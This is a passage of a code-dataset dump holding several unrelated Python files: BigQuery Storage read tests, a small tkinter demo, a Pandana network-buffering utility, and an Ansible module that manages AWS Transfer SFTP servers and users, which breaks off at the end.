(bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_decoding_data_types(\n client, project_id, all_types_table_ref, bq_client, data_format\n):\n data = [\n {\n u\"string_field\": u\"Price: € 9.95.\",\n u\"bytes_field\": bigquery._helpers._bytes_to_json(b\"byteees\"),\n u\"int64_field\": -1085,\n u\"float64_field\": -42.195,\n u\"numeric_field\": \"1.4142\",\n u\"bool_field\": True,\n u\"geography_field\": '{\"type\": \"Point\", \"coordinates\": [-49.3028, 69.0622]}',\n u\"person_struct_field\": {u\"name\": u\"John\", u\"age\": 42},\n u\"timestamp_field\": 1565357902.017896, # 2019-08-09T13:38:22.017896\n u\"date_field\": u\"1995-03-17\",\n u\"time_field\": u\"16:24:51\",\n u\"datetime_field\": u\"2005-10-26T19:49:41\",\n u\"string_array_field\": 
[u\"foo\", u\"bar\", u\"baz\"],\n }\n ]\n\n _add_rows(all_types_table_ref, data, bq_client)\n\n session = client.create_read_session(\n all_types_table_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n\n assert session.streams # there should be data available\n\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=session.streams[0]\n )\n\n rows = list(client.read_rows(stream_pos).rows(session))\n\n expected_result = {\n u\"string_field\": u\"Price: € 9.95.\",\n u\"bytes_field\": b\"byteees\",\n u\"int64_field\": -1085,\n u\"float64_field\": -42.195,\n u\"numeric_field\": decimal.Decimal(\"1.4142\"),\n u\"bool_field\": True,\n u\"geography_field\": \"POINT(-49.3028 69.0622)\",\n u\"person_struct_field\": {u\"name\": u\"John\", u\"age\": 42},\n u\"timestamp_field\": dt.datetime(2019, 8, 9, 13, 38, 22, 17896, tzinfo=pytz.UTC),\n u\"date_field\": dt.date(1995, 3, 17),\n u\"time_field\": dt.time(16, 24, 51),\n u\"string_array_field\": [u\"foo\", u\"bar\", u\"baz\"],\n }\n\n result_copy = copy.copy(rows[0])\n del result_copy[\"datetime_field\"]\n assert result_copy == expected_result\n\n # Compare datetime separately, AVRO and PYARROW return different object types,\n # although they should both represent the same value.\n # TODO: when fixed, change assertion to assert a datetime instance!\n expected_pattern = re.compile(r\"2005-10-26( |T)19:49:41\")\n assert expected_pattern.match(str(rows[0][\"datetime_field\"]))\n\n\n@pytest.mark.parametrize(\n \"data_format\",\n (\n (bigquery_storage_v1beta1.enums.DataFormat.AVRO),\n (bigquery_storage_v1beta1.enums.DataFormat.ARROW),\n ),\n)\ndef test_resuming_read_from_offset(client, project_id, data_format):\n shakespeare_ref = bigquery_storage_v1beta1.types.TableReference()\n shakespeare_ref.project_id = project_id\n shakespeare_ref.dataset_id = \"public_samples_copy\"\n shakespeare_ref.table_id = \"shakespeare\"\n\n read_session = client.create_read_session(\n shakespeare_ref,\n \"projects/{}\".format(project_id),\n format_=data_format,\n requested_streams=1,\n )\n\n assert read_session.streams # there should be data available\n\n stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=read_session.streams[0], offset=0\n )\n read_rows_stream = client.read_rows(stream_pos)\n\n # fetch the first two batches of rows\n rows_iter = iter(read_rows_stream)\n some_rows = next(rows_iter)\n more_rows = next(rows_iter)\n\n # fetch the rest of the rows using the stream offset\n new_stream_pos = bigquery_storage_v1beta1.types.StreamPosition(\n stream=read_session.streams[0], offset=some_rows.row_count + more_rows.row_count\n )\n remaining_rows_count = sum(\n 1 for _ in client.read_rows(new_stream_pos).rows(read_session)\n )\n\n # verify that the counts match\n expected_len = 164656 # total rows in shakespeare table\n actual_len = remaining_rows_count + some_rows.row_count + more_rows.row_count\n assert actual_len == expected_len\n","repo_name":"beittatt/cloud-python","sub_path":"bigquery_storage/tests/system/test_reader.py","file_name":"test_reader.py","file_ext":"py","file_size_in_byte":14139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11275870693","text":"\nfrom tkinter import *\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\nimport time\n\nprint(\"test\")\n\nbox = Tk()\nbox.geometry(\"600x600\")\nLabel(box, text=\"First\").grid(row=0, sticky=W)\nLabel(box, text=\"Second\").grid(row=1, sticky=W)\n\ne1 = 
Entry(box)\ne2 = Entry(box)\n\ne1.grid(row=0, column=1)\ne2.grid(row=1, column=2)\n\npict2 = Image.open(\"S.jpg\")\nimg2 = ImageTk.PhotoImage(pict2)\nlabel = Label(image=img2)\nlabel.grid(row=1, column=3)\n\nbox.mainloop()\n","repo_name":"LinuxLou2022/pythonProject01","sub_path":"test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72434585127","text":"\n\nimport logging\nimport os\n\nimport numpy as np\nimport pandas as pd\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef undupe_column_names(df, template=\"{} ({})\"):\n \"\"\"\n rename df column names so there are no duplicates (in place)\n\n e.g. if there are two columns named \"dog\", the second column will be reformatted to \"dog (2)\"\n\n Parameters\n ----------\n df : pandas.DataFrame\n dataframe whose column names should be de-duplicated\n template : template taking two arguments (old_name, int) to use to rename columns\n\n Returns\n -------\n df : pandas.DataFrame\n dataframe that was renamed in place, for convenience in chaining\n \"\"\"\n\n new_names = []\n seen = set()\n for name in df.columns:\n n = 1\n new_name = name\n while new_name in seen:\n n += 1\n new_name = template.format(name, n)\n new_names.append(new_name)\n seen.add(new_name)\n df.columns = new_names\n return df\n\n\ndef read_buffer_spec(fname,\n description_name=\"Description\",\n target_name=\"Target\",\n variable_name=\"Variable\",\n target_df_name=\"TargetDF\",\n expression_name=\"Expression\"\n ):\n\n \"\"\"\n Read a CSV model specification into a Pandas DataFrame or Series.\n\n The CSV is expected to have columns for component descriptions\n targets, and expressions,\n\n The CSV is required to have a header with column names. 
For example:\n\n Description,Target,Variable, TargetDF, Expression\n\n Parameters\n ----------\n fname : str\n Name of a CSV spec file.\n description_name : str, optional\n Name of the column in `fname` that contains the component description.\n target_name : str, optional\n Name of the column in `fname` that contains the component target.\n variable_name : str, optional\n Name of the column in `fname` that contains the variable target.\n target_df_name : str, optional\n Name of the column in `fname` that contains the target dataframe.\n expression_name : str, optional\n Name of the column in `fname` that contains the component expression.\n\n\n Returns\n -------\n spec : pandas.DataFrame\n dataframe with three columns: ['description' 'variable' 'target_df' 'target' 'expression']\n \"\"\"\n\n cfg = pd.read_csv(fname, comment='#')\n\n # drop null expressions\n # cfg = cfg.dropna(subset=[expression_name])\n\n cfg.rename(columns={target_name: 'target',\n expression_name: 'expression',\n description_name: 'description',\n variable_name: 'variable',\n target_df_name: 'target_df'},\n inplace=True)\n\n # backfill description\n if 'description' not in cfg.columns:\n cfg.description = ''\n\n cfg.target = cfg.target.str.strip()\n cfg.expression = cfg.expression.str.strip()\n\n return cfg\n\n\nclass NumpyLogger(object):\n def __init__(self, logger):\n self.logger = logger\n self.target = ''\n self.expression = ''\n\n def write(self, msg):\n self.logger.error(\"numpy warning: %s\" % (msg.rstrip()))\n self.logger.error(\"expression: %s = %s\" % (str(self.target), str(self.expression)))\n\n\ndef buffer_variables(buffer_expressions,\n zone_df_name, locals_dict,\n df_alias=None, trace_rows=None):\n \"\"\"\n Perform network accessibility calculations (using Pandana libary\n http://udst.github.io/pandana/) on point based data (e.g. zone\n centroids) using a set of expressions from a spec in the context of\n a given data table.\n\n Expressions are evaluated using Python's eval function.\n Python expressions have access to variables in locals_d.\n They also have access to previously assigned\n targets as the assigned target name.\n\n zone_df_name is the name of the data frame in locals_dict, which represents\n point data, to which all buffering and network distance measurements are\n applied. In order to do this, each row (point) in zone_df must be associated with it's\n nearest node in the Pandana network. This is achieved using the Pandana method\n network.get_node_ids. The buffering operations are performed on each node in the\n network, thus allowing the results to be joined to the zone df via node_id. Only\n the results that share the same nodes in the zone_df_name data frame\n are returned.\n\n For example, in order to find the distance of each zone to the nearest\n bus stop, we need a data frame representing bus stop locations and their\n nearest network node. Pandana then finds the distance from every node in\n the network to the nearest node that represents a bus stop. Next, only\n the distances for nodes that are associated with the zone dataframe are\n kept and the results are indexed to the zone dataframe.\n\n lowercase variables starting with underscore are temp variables (e.g. _local_var)\n and not returned except in trace_restults\n\n uppercase variables starting with underscore are temp variables (e.g. 
_LOCAL_SCALAR)\n and not returned except in trace_assigned_locals\n This is useful for defining general purpose local constants in expression file\n\n Users should take care that expressions should result in\n a Pandas Series (scalars will be automatically promoted to series.)\n\n Parameters\n ----------\n buffer_expressions : pandas.DataFrame of target assignment expressions\n target: target column names\n variable: target variable to be buffered\n target_df: datafram that contains the variable to be buffered.\n expression: pandana, pandas or python expression to evaluate\n zone_df_name : the name of the df in df_dict to which all results\n will be indexed.\n df_dict : dictionary of pandas.DataFrames. This must include the df\n referenced by zone_df_name. A poi_df can be used to find distances\n to other points like bus stops. All poi's should be stored in this\n one df. Other dfs can be used for aggregate buffering such as\n intersections_df.\n locals_dict : Dict\n This is a dictionary of local variables that will be the environment\n for an evaluation of \"python\" expression.\n trace_rows: series or array of bools to use as mask to select target rows to trace\n\n Returns\n -------\n variables : pandas.DataFrame\n Will have the index of `df` and columns named by target and containing\n the result of evaluating expression\n trace_df : pandas.DataFrame or None\n a dataframe containing the eval result values for each assignment expression\n \"\"\"\n\n np_logger = NumpyLogger(logger)\n\n def is_local(target):\n return target.startswith('_') and target.isupper()\n\n def is_temp(target):\n return target.startswith('_')\n\n def to_series(x, target=None):\n if x is None or np.isscalar(x):\n if target:\n logger.warn(\"WARNING: assign_variables promoting scalar %s to series\" % target)\n x = pd.Series([x] * len(locals_dict[zone_df_name].index),\n index=locals_dict[zone_df_name].index)\n if not isinstance(x, pd.Series):\n x = pd.Series(x)\n x.name = target\n\n return x\n\n trace_assigned_locals = trace_results = None\n if trace_rows is not None:\n # convert to numpy array so we can slice ndarrays as well as series\n trace_rows = np.asanyarray(trace_rows)\n if trace_rows.any():\n trace_results = []\n trace_assigned_locals = {}\n\n # avoid touching caller's passed-in locals_d parameter (they may be looping)\n locals_dict = locals_dict.copy() if locals_dict is not None else {}\n local_keys = list(locals_dict.keys())\n\n le = []\n traceable = True\n # need to be able to identify which variables causes an error, which keeps\n # this from being expressed more parsimoniously\n for e in zip(buffer_expressions.target, buffer_expressions.variable,\n buffer_expressions.target_df, buffer_expressions.expression):\n target, var, target_df, expression = e\n\n if target in local_keys:\n logger.warn(\"buffer_variables target obscures local_d name '%s'\" % str(target))\n\n if is_local(target):\n\n x = eval(expression, globals(), locals_dict)\n locals_dict[target] = x\n if trace_assigned_locals is not None:\n trace_assigned_locals[target] = x\n continue\n\n try:\n\n # FIXME - log any numpy warnings/errors but don't raise\n np_logger.target = str(target)\n np_logger.expression = str(expression)\n saved_handler = np.seterrcall(np_logger)\n save_err = np.seterr(all='log')\n\n network = locals_dict['network']\n logger.debug(\"solving expression: %s\" % target)\n\n # aggregate query\n if 'aggregate' in expression:\n network.set(locals_dict[target_df][locals_dict['node_id']],\n variable=locals_dict[target_df][var], 
name=var)\n values = to_series(eval(expression, globals(), locals_dict), target=target)\n # index results to the zone_df:\n locals_dict[zone_df_name][target] = \\\n values.loc[locals_dict[zone_df_name][locals_dict['node_id']]].values\n values = locals_dict[zone_df_name][target]\n traceable = True\n\n # nearest poi\n elif 'nearest_pois' in expression:\n # records we want to run nearest poi on should have a value of 1.\n # Ex: could have a table of transit stops,\n # where each column is a type of transit stop, e.g. light rail, and a\n # value of 1 in the light rail column\n # means that the stop is a light rail stop.\n temp_df = locals_dict[target_df][(locals_dict[target_df][var] == 1)]\n\n if not temp_df.empty:\n network.set_pois(category=var,\n maxdist=locals_dict['max_dist'],\n maxitems=locals_dict['max_pois'],\n x_col=temp_df[locals_dict['poi_x']],\n y_col=temp_df[locals_dict['poi_y']])\n # poi queries return a df, no need to put through to_series function.\n values = eval(expression, globals(), locals_dict)\n # index results to the zone_df:\n locals_dict[zone_df_name][target] = \\\n values.loc[locals_dict[zone_df_name][locals_dict['node_id']]].values\n else:\n locals_dict[zone_df_name][target] = 999\n\n values = locals_dict[zone_df_name][target]\n # if assignment is to a df that is not the zone df, then cannot trace results\n if target_df != zone_df_name:\n traceable = False\n\n # pandas df assignment:\n else:\n values = to_series(eval(expression, globals(), locals_dict), target=target)\n values.index = locals_dict[target_df].index # must be the same df as in expression\n # the target_df might need this column for a subsequent buffer operation\n # delete if exists (keyword form; the positional axis argument was removed in pandas 2.0):\n if target in locals_dict[target_df].columns:\n locals_dict[target_df].drop(columns=[target], inplace=True)\n locals_dict[target_df] = locals_dict[target_df].merge(pd.DataFrame(\n values), how='left', left_index=True, right_index=True)\n # if assignment is to a df that is not the zone df, then cannot trace results\n if target_df != zone_df_name:\n traceable = False\n\n np.seterr(**save_err)\n np.seterrcall(saved_handler)\n\n except Exception as err:\n logger.error(\"assign_variables error: %s: %s\" % (type(err).__name__, str(err)))\n\n logger.error(\"assign_variables expression: %s = %s\"\n % (str(target), str(expression)))\n\n # values = to_series(None, target=target)\n raise err\n\n le.append((target, values))\n\n
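The three expression styles handled above (Pandana aggregate, nearest_pois, and plain pandas) are easiest to see with a concrete spec. A minimal sketch with illustrative values only: the expression strings and column values below are made up, and the `network`, `node_id`, `max_dist`, `max_pois`, `poi_x` and `poi_y` entries are assumed to already be present in locals_dict; none of this is taken from the netbuffer source.

import pandas as pd

# Hypothetical five-column spec in the format buffer_variables consumes;
# each row is (description, target, variable, target_df, expression).
spec = pd.DataFrame(
    [
        # 'aggregate' branch: sum a column within 400m of every network node
        ('intersection count', 'int_cnt', 'int_cnt', 'intersections_df',
         "network.aggregate(400, type='sum', decay='flat', name='int_cnt')"),
        # 'nearest_pois' branch: network distance to the closest bus stop
        ('bus stop distance', 'dist_bus', 'bus_stop', 'poi_df',
         "network.nearest_pois(5000, 'bus_stop', num_pois=1)[1]"),
        # plain pandas branch: derive a new column on the zone dataframe
        ('log bus distance', 'log_dist_bus', 'None', 'zone_df',
         "np.log1p(zone_df.dist_bus)"),
    ],
    columns=['description', 'target', 'variable', 'target_df', 'expression'])

The first row relies on the loop calling network.set(...) before the eval, and the second on set_pois(...), exactly as in the branches above.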
 if trace_results is not None:\n # some calcs are not included in the final df so may not have the\n # zones that are being traced. These should have a value of 'None' in\n # spec under the 'variable' column.\n if traceable:\n trace_results.append((target, values[trace_rows]))\n\n # update locals to allow us to reference previously assigned targets\n locals_dict[target] = values\n\n # build a dataframe of eval results for non-temp targets\n # since we allow targets to be recycled, we want to only keep the last usage\n # we scan through targets in reverse order and add them to the front of the list\n # the first time we see them so they end up in execution order\n variables = []\n seen = set()\n for statement in reversed(le):\n # statement is a tuple (target, values)\n target_name = statement[0]\n if not is_temp(target_name) and target_name not in seen:\n variables.insert(0, statement)\n seen.add(target_name)\n\n # DataFrame from list of tuples [(target, values), ...]\n variables = pd.DataFrame.from_dict(dict(variables))\n if trace_results is not None:\n trace_results = pd.DataFrame.from_dict(dict(trace_results))\n trace_results.index = locals_dict[zone_df_name][trace_rows].index\n trace_results = undupe_column_names(trace_results)\n\n # add df columns to trace_results\n # trace_results = pd.concat([locals_dict[zone_df_name], trace_results], axis=1)\n return variables, trace_results, trace_assigned_locals\n","repo_name":"RSGInc/netbuffer","sub_path":"netbuffer/core/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":14046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21765493373","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nDOCUMENTATION = '''\n---\nmodule: transfer\nshort_description: Manage SFTP Servers in AWS.\ndescription:\n - Manage SFTP Servers in AWS Using AWS Transfer Service.\nversion_added: \"2.4\"\nrequirements: [ boto3, pydash ]\nauthor: \"Mark J. Horninger(@spam-n-eggs); Dominion Solutions LLC (@dominion-solutions); TAPP Network, LLC (@TappNetwork)\"\noptions:\n name:\n description:\n - Fully Qualified Domain name of the SFTP Server to create\n required: true\n type: str\n state:\n description:\n - Create or remove the SFTP Server\n - Present will also execute an update if necessary.\n required: false\n default: present\n choices: [ 'present', 'absent', 'add_user', 'remove_user' ]\n type: str\n tags:\n description:\n - tags dict to apply to the server\n type: dict\n purge_tags:\n description:\n - whether to remove tags that aren't present in the C(tags) parameter\n type: bool\n default: True\n endpoint_type:\n description:\n - The type of endpoint to be used.\n type: str\n choices: ['PUBLIC', 'VPC_ENDPOINT']\n default: 'PUBLIC'\n identity_provider_type:\n description:\n - The identity provider type.\n type: str\n choices: ['SERVICE_MANAGED', 'API_GATEWAY']\n default: 'SERVICE_MANAGED'\n user_home_directory_type:\n description:\n - The Type of directory that the user is mapped to.\n type: str\n choices: ['PATH', 'LOGICAL']\n user_home_directory:\n description:\n - The location of the directory for the user home directory.\n type: str\n default: '/'\n user_home_directory_mappings:\n description:\n - Mappings for the user home directory on S3 to the local filesystem on the SFTP server.\n type: dict\n user_name:\n description:\n - The user name to create an account on the SFTP Server for.\n type: str\n user_policy:\n description:\n - A JSON-Formatted policy to limit the user, if needed.\n type: str\n user_role:\n description:\n - The ARN that points to the role that the user should assume. 
This role should have access to the S3 Bucket.\n type: str\n user_ssh_public_key_body:\n description:\n - The body of the public key that will be used (if pre-generated) to access the SFTP Server.\n type: str\n user_tags:\n description:\n - Tags that should be associated with the user when created.\n type: list\n host_key:\n description:\n - The SSH-keygen generated key for this particular host.\n - It is not recommended to manage your own SSH keys for sftp hosts, but it is provided as a convenience for migration.\n type: str\n identity_provider_role:\n description:\n - The role parameter provides the type of role used to authenticate the user account.\n - Length Constraints - Minimum length of 20. Maximum length of 2048.\n - 'Pattern:: arn::.*role/.*'\n type: str\n identity_provider_url:\n description:\n - The Url parameter provides contains the location of the service endpoint used to authenticate users.\n - Length Constraints - Maximum length of 255.\n type: str\n logging_role:\n description:\n - A value that allows the service to write your SFTP users' activity to your Amazon CloudWatch logs for monitoring and auditing purposes.\n - Length Constraints - Minimum length of 20. Maximum length of 2048.\n - 'Pattern:: arn::.*role/.*'\n type: str\n transfer_endpoint_url:\n description:\n - The URL for the transfer endpoint.\n type: str\n vpc_id:\n description:\n - the VPC to place the created SFTP server into.\n type: str\nextends_documentation_fragment:\n - aws\n - ec2\nnotes:\n - If C(requestPayment), C(policy), C(tagging) or C(versioning)\n operations/API aren't implemented by the endpoint, module doesn't fail\n if related parameters I(requester_pays), I(policy), I(tags) or\n I(versioning) are C(None).\n'''\n\nEXAMPLES = '''\n# Note: These examples do not set authentication details, see the AWS Guide for details.\n\n'''\n\n\nfrom ansible.module_utils.basic import to_text\nfrom ansible.module_utils.aws.core import AnsibleAWSModule\nfrom ansible.module_utils.ec2 import ec2_argument_spec, AWSRetry, boto3_tag_list_to_ansible_dict, \\\n ansible_dict_to_boto3_tag_list\ntry:\n import boto3\n from pydash import py_\n from botocore.exceptions import BotoCoreError, ClientError, EndpointConnectionError, WaiterError\nexcept ImportError:\n pass # handled by AnsibleAWSModule\n\nSERVER_NAME_KEY = 'aws:transfer:customHostname'\n\nfrom ansible.module_utils.ec2 import get_aws_connection_info\ntry:\n import boto3\nexcept ImportError:\n # Pass it to the AnsibleAWSModule\n pass\n\n\ndef create_or_update_sftp(client, module):\n name = module.params.get(\"name\")\n purge_tags = module.params.get(\"purge_tags\")\n tags = {}\n if module.params.get(\"tags\") is not None:\n tags = module.params.get(\"tags\")\n endpoint_type = module.params.get(\"endpoint_type\")\n vpc_id = module.params.get(\"vpc_id\")\n host_key = module.params.get(\"host_key\")\n identity_provider_type = module.params.get(\"identity_provider_type\")\n identity_provider_role = module.params.get(\"identity_provider_role\")\n identity_provider_url = module.params.get(\"identity_provider_url\")\n logging_role = module.params.get(\"logging_role\")\n changed = False\n result = {}\n sftp_server = None\n needs_creation = False\n\n # TODO: Eventually, this needs to support all of the endpoint details, including vpc endpoint ids.\n endpoint_details = None\n if endpoint_type != 'PUBLIC' and vpc_id is not None:\n endpoint_details = {\n # \"AddressAllocationIds\": [],\n # \"SubnetIds\": [],\n # \"VpcEndpointId\": \"\",\n \"VpcId\": vpc_id\n }\n\n 
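For orientation, the dictionaries assembled in this function are handed to the boto3 Transfer client nearly verbatim. A minimal sketch of the eventual API call outside of Ansible; the parameter names follow boto3's create_server, while the region, VPC id, and hostname below are placeholders:

import boto3

client = boto3.client('transfer', region_name='us-east-1')
response = client.create_server(
    EndpointType='VPC_ENDPOINT',  # or 'PUBLIC'
    EndpointDetails={'VpcId': 'vpc-0123456789abcdef0'},  # placeholder VPC id
    IdentityProviderType='SERVICE_MANAGED',
    Tags=[{'Key': 'aws:transfer:customHostname', 'Value': 'sftp.example.com'}],
)
print(response['ServerId'])  # the API returns a single-field dict, e.g. {'ServerId': 's-0123456789abcdef0'}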
identity_provider_details = None\n if identity_provider_url is not None and identity_provider_role is not None:\n identity_provider_details = {\n \"InvocationRole\": identity_provider_role,\n \"Url\": identity_provider_url\n }\n\n name_tag = {'Key': SERVER_NAME_KEY, 'Value': name}\n assigned_tags = [name_tag]\n\n try:\n sftp_server = find_sftp_server(client, name)\n needs_creation = sftp_server is None\n except EndpointConnectionError as e:\n module.fail_json_aws(e, msg=\"Invalid endpoint provided: %s\" % to_text(e))\n except (BotoCoreError, ClientError) as e:\n module.fail_json_aws(e, msg=\"Failed to check Transfer presence\")\n if needs_creation:\n result = create_sftp_server(client, endpoint_details, endpoint_type, host_key,\n identity_provider_details, identity_provider_type, logging_role, name_tag)\n sftp_server_id = result['ServerId']\n changed = True\n else:\n sftp_server_id = sftp_server['Server']['ServerId']\n if not purge_tags:\n assigned_tags = sftp_server['Tags']\n # Update SFTP Server Details\n # Update Tags\n for key, value in tags.items():\n item = py_.find(assigned_tags, {'Key': key})\n if item:\n item['Value'] = value\n else:\n item = {'Key': key, 'Value': value}\n assigned_tags.append(item)\n update_args = build_server_kwargs(endpoint_details, endpoint_type, host_key, identity_provider_details,\n identity_provider_type, logging_role, name, sftp_server_id, is_update=True)\n\n result = client.update_server(**update_args)\n changed = True\n\n module.exit_json(changed=changed, name=name, **result)\n\n\ndef find_sftp_server(client, server_name):\n # Finding a server by name is a little more complicated than I originally expected. Rather than wasting resources\n # it's much easier to just go find it and then check if the return value of this method is None.\n # Load all of the server IDs in the account\n all_server_ids = py_.map(client.list_servers()['Servers'], 'ServerId')\n all_servers = py_.map_(all_server_ids, (lambda server_id: client.describe_server(ServerId=server_id)))\n host = py_.find(all_servers, {'Server': {'Tags': [{'Key': SERVER_NAME_KEY, 'Value': server_name}]}})\n return host\n\n\n@AWSRetry.exponential_backoff(max_delay=120)\ndef create_sftp_server(client, endpoint_details, endpoint_type, host_key,\n identity_provider_details, identity_provider_type, logging_role, name):\n \"\"\"\n Does the work of actually creating the SFTP Server.\n :arg client: boto3.session.Session the boto3 client that is used to create the connection\n :arg endpoint_details: object The details that are provided to the endpoint - right now vpc_id is the only supported\n information.\n :arg endpoint_type: str The type of endpoint that the created SFTP Server connects to. AWS Supports PUBLIC, VPC and\n VPC_ENDPOINT\n :arg host_key: str This is the generated ssh key for the host, the result of ssh-keygen. Do not use this unless you\n are transitioning from another SFTP Server and need to maintain backward compatibility.\n :arg identity_provider_details: object The information for the provided entity type.\n See https://docs.aws.amazon.com/transfer/latest/userguide/API_IdentityProviderDetails.html for more details.\n :arg identity_provider_type: str Currently supports SERVICE_MANAGED or API_GATEWAY - if using API_GATEWAY,\n identity_provider_details becomes required. 
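As a concrete illustration of the API_GATEWAY case just described, the details object pairs an invocation role with the authentication endpoint. Both values in this sketch are hypothetical placeholders, not working resources:

identity_provider_details = {
    'InvocationRole': 'arn:aws:iam::123456789012:role/sftp-auth-invoker',  # hypothetical role ARN
    'Url': 'https://abc123.execute-api.us-east-1.amazonaws.com/prod/auth',  # hypothetical API Gateway URL
}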
SERVICE_MANAGED is the default, and allows AWS to manage the SFTP\n server.\n :arg logging_role: str A value that allows the service to write your SFTP users' activity to your Amazon CloudWatch\n logs for monitoring and auditing purposes.\n :arg name: dict The name of the SFTP server that also becomes the FQDN of it, in tag format.\n :rtype: dict A Single Entry Dictionary that contains the Server ID.\n \"\"\"\n kwargDict = build_server_kwargs(endpoint_details, endpoint_type, host_key, identity_provider_details,\n identity_provider_type, logging_role, name)\n\n response = client.create_server(**kwargDict)\n # According to the documentation response should be an object containing a single string like this:\n # {\n # ServerId: 'string(19)'\n # }\n return response\n\n\ndef build_server_kwargs(endpoint_details, endpoint_type, host_key, identity_provider_details, identity_provider_type,\n logging_role, name, server_id=None, is_update=False):\n kwarg_dict = {}\n if not is_update:\n kwarg_dict['Tags'] = [name]\n if endpoint_details is not None:\n kwarg_dict['EndpointDetails'] = endpoint_details\n if endpoint_type is not None:\n kwarg_dict['EndpointType'] = endpoint_type\n if host_key is not None:\n kwarg_dict['HostKey'] = host_key\n if identity_provider_details is not None:\n kwarg_dict['IdentityProviderDetails'] = identity_provider_details\n if identity_provider_type is not None and not is_update:\n kwarg_dict['IdentityProviderType'] = identity_provider_type\n if logging_role is not None:\n kwarg_dict['LoggingRole'] = logging_role\n if server_id is not None:\n kwarg_dict['ServerId'] = server_id\n return kwarg_dict\n\n\ndef add_sftp_users(client, module):\n changed = False\n user_name = module.params.get('user_name')\n user_home_directory = module.params.get('user_home_directory')\n user_home_directory_type = module.params.get('user_home_directory_type')\n user_home_directory_mappings = module.params.get('user_home_directory_mappings')\n user_policy = module.params.get('user_policy')\n user_role = module.params.get('user_role')\n user_ssh_public_key_body = module.params.get('user_ssh_public_key_body')\n user_tags = module.params.get('user_tags')\n name = module.params.get('name')\n\n result = add_user(client, user_name, user_home_directory, user_home_directory_type, user_home_directory_mappings,\n user_policy, user_role, user_ssh_public_key_body, user_tags, name)\n changed = True\n module.exit_json(changed=changed, **result)\n\n\n@AWSRetry.exponential_backoff(max_delay=120)\ndef add_user(client, user_name, user_home_directory, user_home_directory_type,\n user_home_directory_mappings, user_policy, user_role, user_ssh_public_key_body, user_tags, name):\n result = {}\n sftp_server = find_sftp_server(client, name)\n exists = False\n if sftp_server is not None:\n sftp_server_id = sftp_server['Server']['ServerId']\n users = client.list_users(\n ServerId=sftp_server_id\n )\n\n if users is not None:\n exists = (py_.find_index(users['Users'], {\"UserName\": user_name}) != -1)\n\n add_user_kwargs = dict(\n Role=user_role,\n ServerId=sftp_server_id,\n UserName=user_name\n )\n\n if user_home_directory is not None:\n add_user_kwargs['HomeDirectory'] = user_home_directory\n if user_home_directory_type is not None:\n add_user_kwargs['HomeDirectoryType'] = user_home_directory_type\n if user_home_directory_mappings is not None:\n add_user_kwargs['HomeDirectoryMappings'] = user_home_directory_mappings\n if user_policy is not None:\n add_user_kwargs['Policy'] = user_policy\n if user_ssh_public_key_body is not 
None:\n add_user_kwargs['SshPublicKeyBody'] = user_ssh_public_key_body\n if user_tags is not None:\n add_user_kwargs['Tags'] = user_tags\n\n if not exists:\n result = client.create_user(**add_user_kwargs)\n else:\n result = client.update_user(**add_user_kwargs)\n\n return result\n\n\n@AWSRetry.exponential_backoff(max_delay=120)\ndef destroy_sftp_server(client, module):\n name = module.params.get('name')\n sftp_server = find_sftp_server(client, name)\n changed = False\n if sftp_server is not None:\n sftp_server_id = sftp_server['Server']['ServerId']\n response = client.delete_server(ServerId=sftp_server_id)\n changed = True\n module.exit_json(changed=changed, name=name, **response)\n\n\n@AWSRetry.exponential_backoff(max_delay=120)\ndef destroy_sftp_users(client, module):\n changed = False\n response = dict()\n name = module.params.get('name')\n user_name = module.params.get('user_name')\n sftp_server_id = get_sftp_server_id(client, name)\n response = client.delete_user(ServerId=sftp_server_id, UserName=user_name)\n changed = True\n\n module.exit_json(changed=changed, name=name, **response)\n\n\ndef get_sftp_server_id(client, name):\n sftp_server = find_sftp_server(client, name)\n sftp_server_id = sftp_server['Server']['ServerId']\n return sftp_server_id\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(\n dict(\n name=dict(required=True),\n state=dict(default='present', choices=['present', 'absent', 'add_user', 'remove_user']),\n tags=dict(type='dict'),\n purge_tags=dict(type='bool', default=True),\n # Default to public because AWS does. This is probably not the best option.\n endpoint_type=dict(default=\"PUBLIC\", choices=['PUBLIC', 'VPC_ENDPOINT']),\n vpc_id=dict(required=False),\n host_key=dict(),\n identity_provider_type=dict(default='SERVICE_MANAGED', choices=['SERVICE_MANAGED', 'API_GATEWAY']),\n identity_provider_role=dict(),\n identity_provider_url=dict(),\n transfer_endpoint_url=dict(),\n logging_role=dict(),\n user_name=dict(type='str'),\n user_home_directory=dict(type='str', default='/'),\n user_home_directory_type=dict(type='str', choices=['PATH', 'LOGICAL']),\n user_home_directory_mappings=dict(type='dict'),\n user_policy=dict(type='str'),\n user_role=dict(type='str'),\n user_ssh_public_key_body=dict(type='str'),\n user_tags=dict(type='list'),\n )\n )\n\n module = AnsibleAWSModule(\n argument_spec=argument_spec,\n )\n\n region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)\n\n if region in ('us-east-1', '', None):\n # default to US Standard region\n location = 'us-east-1'\n else:\n # Boto uses symbolic names for locations but region strings will\n # actually work fine for everything except us-east-1 (US Standard)\n location = region\n\n # Get AWS connection information.\n endpoint_url = module.params.get('transfer_endpoint_url')\n aws_access_token = aws_connect_kwargs.get('aws_access_key_id')\n aws_secret_key = aws_connect_kwargs.get('aws_secret_access_key')\n aws_session_token = aws_connect_kwargs.get('security_token')\n\n state = module.params.get(\"state\")\n\n transfer_client = boto3.client(service_name='transfer', region_name=region, endpoint_url=endpoint_url,\n aws_access_key_id=aws_access_token, aws_secret_access_key=aws_secret_key,\n aws_session_token=aws_session_token)\n\n if state == 'present':\n create_or_update_sftp(transfer_client, module)\n elif state == 'absent':\n destroy_sftp_server(transfer_client, module)\n elif 